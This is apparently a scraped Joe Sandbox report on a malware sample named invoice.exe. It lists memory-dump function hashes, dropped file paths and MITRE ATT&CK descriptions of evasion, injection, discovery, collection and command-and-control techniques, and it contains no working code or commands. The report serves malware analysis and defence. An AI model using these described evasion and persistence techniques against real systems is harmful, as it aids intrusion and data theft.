Opcode Fuzzy Hash: 8ac1574efd2aebaffbc6a321ae81726fb83362e5a005fad2b0f00b847f5571b8
Instruction Fuzzy Hash: 0C2128B5504380DFFB01DF24D9D0B16BF65EF88368F608969D8052B247C736D555CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 3767D404 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9012673043.000000003767D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3767D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3767d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 689edce634150dceb63b9cca2f8d7c1d72203c0765d98a745c71081edf1f8d31
Instruction ID: 6fecd19c0ea324996b1548eb3fc5d727705e0fbc28a13d34e450050080ee963b
Opcode Fuzzy Hash: 689edce634150dceb63b9cca2f8d7c1d72203c0765d98a745c71081edf1f8d31
Instruction Fuzzy Hash: BE21F475504380EFEB05CF24D9D1B16BF65FF88364F20C9A9D9092A24BC736E459C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 37745349 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c7d5897427163d8114a2c2cd0891650275bab6dfc881114dc6773947a48e678
Instruction ID: 50ae43a16d75e3251b4068b06644ae9bb8474f65373c18ce52a65bb45734104f
Opcode Fuzzy Hash: 8c7d5897427163d8114a2c2cd0891650275bab6dfc881114dc6773947a48e678
Instruction Fuzzy Hash: D71179B1D00248DBEB04CFAAC4086DDBBB3ABC9311F14D628D414BB258DB745506CF50

Uniqueness

Uniqueness Score: -1.00%

Function 37741EE8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05563453c236e88b4ac6b909e5fe72fd903199eefda1ae9ef6759aa6d620e973
Instruction ID: f38336772c57b5d6edabac39f713a9a7fa0cb5eafd1ac71575e8daf79124e34c
Opcode Fuzzy Hash: 05563453c236e88b4ac6b909e5fe72fd903199eefda1ae9ef6759aa6d620e973
Instruction Fuzzy Hash: 7121F0B4C453099FCB40EFA8C9455EEBFF0BF09300F00556AD805B7220EB345A56CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 3767D4EB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9012673043.000000003767D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3767D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3767d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f505c169350cc1b1324d3390ad1989b6c484bda0c8e4357e7c0b39a9128f15f
Instruction ID: d7f01da3a10c2b7f931d4e769de4f155e55ea0d2a663459c0b9d26c4f8387ac6
Opcode Fuzzy Hash: 4f505c169350cc1b1324d3390ad1989b6c484bda0c8e4357e7c0b39a9128f15f
Instruction Fuzzy Hash: 3B11B1B6504280DFEB02CF10D5C0B06BF61FF84324F248AA9D8491B257C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 3767D3FF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9012673043.000000003767D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3767D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3767d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f505c169350cc1b1324d3390ad1989b6c484bda0c8e4357e7c0b39a9128f15f
Instruction ID: 35af6d0c838222586ae47cfbdeeb88128816b3157518dca986673c22f5169a63
Opcode Fuzzy Hash: 4f505c169350cc1b1324d3390ad1989b6c484bda0c8e4357e7c0b39a9128f15f
Instruction Fuzzy Hash: EB11AF76504280DFDB02CF10D5D4B06BF61FF84364F24C6A9D9491B65BC33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 377451EC Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71bbf8733e4d3b4bbf93557c790530ce0eab17e62a1bf5c9ace14eb3f6edf8f4
Instruction ID: 9f257ba2de1eeed98f50de3205f2172e84de7c18d9f17b60b67599b2d86c3c83
Opcode Fuzzy Hash: 71bbf8733e4d3b4bbf93557c790530ce0eab17e62a1bf5c9ace14eb3f6edf8f4
Instruction Fuzzy Hash: F3E02096D08240DBD70187A6D43517D7F74DDE3291F4454C7D404DF536EE148616D711

Uniqueness

Uniqueness Score: -1.00%

Function 37741FA8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 533e95a15b4ba0d2f66711ed9f36242e9ad0ee6b521c763ee2a445826c0fbe64
Instruction ID: 79ff78f6f11981d02bff2e928fefada0d64a7c240bac0a9abdb990f2d651a621
Opcode Fuzzy Hash: 533e95a15b4ba0d2f66711ed9f36242e9ad0ee6b521c763ee2a445826c0fbe64
Instruction Fuzzy Hash: DCD01231D2022A568B04A6A5DC444DEB738EED5261B914666D51437140EB70266986A1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 37746300 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba8251eb7acafbf7de2abae54b193d63641e047c6eed16587b1ab2d4e53b8abf
Instruction ID: 94904aecceafb7b79b30326dc3f2e03444a6dd8fe83e6a5454417aaeb7ac34dd
Opcode Fuzzy Hash: ba8251eb7acafbf7de2abae54b193d63641e047c6eed16587b1ab2d4e53b8abf
Instruction Fuzzy Hash: 1F529A74E01228CFDB64CF65C984BDDBBB2BB89305F1085EAD809AB254DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report invoice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_caspol.exe_d8eda6a1754a151dd5173ca6db3e65435df63db_ea830a9b_04bcfbd1-2c77-4702-aba0-8ccec9d684fc\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD36E.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD563.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD593.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Antimodernly\trever\Hovedinteressers\icon-ui.icns

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Antimodernly\trever\Hovedinteressers\lang-1059.dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Ath_CoexAgent.exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship\vmusbmouse.cat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\Mss32.dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\NMDllHost.exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Stemningssvingning\Urgently.Suk

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Udlandsrejse153\Aeroscopic\Clanging\Uskyldsrent\SourceCodePro-ExtraLight.otf

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Udlandsrejse153\Aeroscopic\Clanging\Uskyldsrent\cs.txt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\figuranternes.Han

C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\AdvSplash.dll

Windows Analysis Report
invoice.exe

Function 004031F1 Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 368
stringcomfileCOMMON

Function 004051CA Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00402D48 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Function 0040572D Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 004020CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Function 00406268 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00403B52 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 004037B5 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00405F87 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00402F81 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON